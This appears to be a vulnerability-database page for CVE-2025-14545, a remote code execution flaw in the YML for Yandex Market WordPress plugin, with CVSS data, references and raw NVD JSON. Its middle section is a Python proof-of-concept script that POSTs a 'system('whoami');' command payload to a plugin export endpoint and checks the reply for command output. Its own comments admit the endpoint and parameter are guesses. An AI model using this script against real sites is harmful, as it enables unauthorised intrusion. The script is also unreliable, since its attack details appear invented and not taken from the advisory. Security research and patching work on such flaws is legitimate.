CVE-2025-14545

Description

The YML for Yandex Market WordPress plugin before 5.0.26 is vulnerable to Remote Code Execution via the feed generation process.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

YML for Yandex Market < 5.0.26

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-14545 Proof of Concept (Conceptual)
# Target: YML for Yandex Market WordPress Plugin < 5.0.26
# Description: Remote Code Execution via feed generation.
# Note: Adjust the target URL and payload parameters based on the actual vulnerable endpoint.

target_url = "http://example.com/wp-content/plugins/yml-for-yandex-market/includes/export.php"

# Malicious payload to execute a system command (e.g., whoami)
# The specific parameter depends on the plugin's implementation (e.g., filter or product options)
payload = {
    "action": "y4ym_export_feed",
    "filter": "system('whoami');" 
}

try:
    response = requests.post(target_url, data=payload, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response:")
        print(response.text)
        # Logic to check if command output is present in the response
        if "www-data" in response.text or "root" in response.text:
            print("[!] Potential RCE confirmed!")
    else:
        print(f"[-] Server returned status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14545
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14545
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14545/
[4] VulDB https://vuldb.com/cve/CVE-2025-14545
[5] https://wpscan.com/vulnerability/9bb1a4ca-976c-461d-82de-8a3b04a56fbc/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14545", "sourceIdentifier": "[email protected]", "published": "2026-04-10T07:16:19.607", "lastModified": "2026-04-15T15:05:47.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The YML for Yandex Market WordPress plugin before 5.0.26 is vulnerable to Remote Code Execution via the feed generation process."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "references": [{"url": "https://wpscan.com/vulnerability/9bb1a4ca-976c-461d-82de-8a3b04a56fbc/", "source": "[email protected]"}]}}